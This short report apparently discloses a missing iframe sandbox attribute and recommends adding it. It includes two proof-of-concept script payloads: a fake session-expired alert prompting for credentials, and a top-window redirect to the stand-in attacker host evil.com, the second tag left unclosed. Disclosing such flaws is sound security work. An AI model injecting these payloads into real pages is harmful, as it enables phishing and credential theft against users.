Iframe tags don’t have a sandbox attribute, this makes an attacker able to execute malicious javascript via an iframe and perform phishing attacks.
The sandbox attribute will block script execution and prevents the content to navigate its top-level browsing context which will stop this type of attack.
Tested on firefox.
<script>alert("Your session has expired, Please enter your credential again")</script>
<script>window.top.location.href = "http://evil.com"; </script
This vulnerability is capable of phishing and stealing users’ data.